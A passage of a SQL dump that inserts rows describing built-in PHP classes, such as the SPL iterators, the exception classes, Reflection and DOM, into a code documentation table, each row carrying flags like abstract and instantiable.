`namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SoapVar', 'SoapVar', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SoapClient', 'SoapClient', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SimpleXMLIterator', 'SimpleXMLIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SimpleXMLElement', 'SimpleXMLElement', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('MultipleIterator', 'MultipleIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplObjectStorage', 'SplObjectStorage', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplPriorityQueue', 'SplPriorityQueue', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplFixedArray', 'SplFixedArray', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplMaxHeap', 'SplMaxHeap', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplMinHeap', 'SplMinHeap', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplStack', 'SplStack', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplHeap', 'SplHeap', '', NULL, 0, 0, 0, '', 1, 0, 0, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplQueue', 'SplQueue', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplDoublyLinkedList', 'SplDoublyLinkedList', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplTempFileObject', 'SplTempFileObject', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplFileObject', 'SplFileObject', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('GlobIterator', 'GlobIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('FilesystemIterator', 'FilesystemIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('RecursiveDirectoryIterator', 'RecursiveDirectoryIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DirectoryIterator', 'DirectoryIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('RecursiveArrayIterator', 'RecursiveArrayIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SplFileInfo', 'SplFileInfo', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ArrayIterator', 'ArrayIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ArrayObject', 'ArrayObject', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('RecursiveTreeIterator', 'RecursiveTreeIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('EmptyIterator', 'EmptyIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('RecursiveRegexIterator', 'RecursiveRegexIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('AppendIterator', 'AppendIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('InfiniteIterator', 'InfiniteIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('RegexIterator', 'RegexIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('NoRewindIterator', 'NoRewindIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('RecursiveCachingIterator', 'RecursiveCachingIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('CachingIterator', 'CachingIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('LimitIterator', 'LimitIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ParentIterator', 'ParentIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('RecursiveFilterIterator', 'RecursiveFilterIterator', '', NULL, 0, 0, 0, '', 1, 0, 0, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('FilterIterator', 'FilterIterator', '', NULL, 0, 0, 0, '', 1, 0, 0, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('IteratorIterator', 'IteratorIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('UnexpectedValueException', 'UnexpectedValueException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('RecursiveIteratorIterator', 'RecursiveIteratorIterator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('UnderflowException', 'UnderflowException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('RangeException', 'RangeException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('OverflowException', 'OverflowException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('OutOfBoundsException', 'OutOfBoundsException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('RuntimeException', 'RuntimeException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('LengthException', 'LengthException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('OutOfRangeException', 'OutOfRangeException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('InvalidArgumentException', 'InvalidArgumentException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DomainException', 'DomainException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('BadMethodCallException', 'BadMethodCallException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('BadFunctionCallException', 'BadFunctionCallException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('LogicException', 'LogicException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ReflectionExtension', 'ReflectionExtension', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ReflectionProperty', 'ReflectionProperty', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ReflectionObject', 'ReflectionObject', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ReflectionClass', 'ReflectionClass', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ReflectionMethod', 'ReflectionMethod', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ReflectionParameter', 'ReflectionParameter', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ReflectionFunction', 'ReflectionFunction', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ReflectionFunctionAbstract', 'ReflectionFunctionAbstract', '', NULL, 0, 0, 0, '', 1, 0, 0, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('Reflection', 'Reflection', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('Directory', 'Directory', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ReflectionException', 'ReflectionException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('php_user_filter', 'php_user_filter', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('finfo', 'finfo', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('__PHP_Incomplete_Class', '__PHP_Incomplete_Class', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMXPath', 'DOMXPath', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMStringExtend', 'DOMStringExtend', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMProcessingInstruction', 'DOMProcessingInstruction', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMEntity', 'DOMEntity', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMEntityReference', 'DOMEntityReference', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMNotation', 'DOMNotation', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMDocumentType', 'DOMDocumentType', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMCdataSection', 'DOMCdataSection', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMConfiguration', 'DOMConfiguration', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMLocator', 'DOMLocator', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMErrorHandler', 'DOMErrorHandler', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMDomError', 'DOMDomError', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMUserDataHandler', 'DOMUserDataHandler', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMTypeinfo', 'DOMTypeinfo', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMComment', 'DOMComment', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMText', 'DOMText', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMElement', 'DOMElement', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMAttr', 'DOMAttr', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMCharacterData', 'DOMCharacterData', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMNamedNodeMap', 'DOMNamedNodeMap', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMNodeList', 'DOMNodeList', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMDocument', 'DOMDocument', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMDocumentFragment', 'DOMDocumentFragment', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMNameSpaceNode', 'DOMNameSpaceNode', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMNode', 'DOMNode', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMImplementation', 'DOMImplementation', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DOMImplementationSource', 'DOMImplementationSource', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, 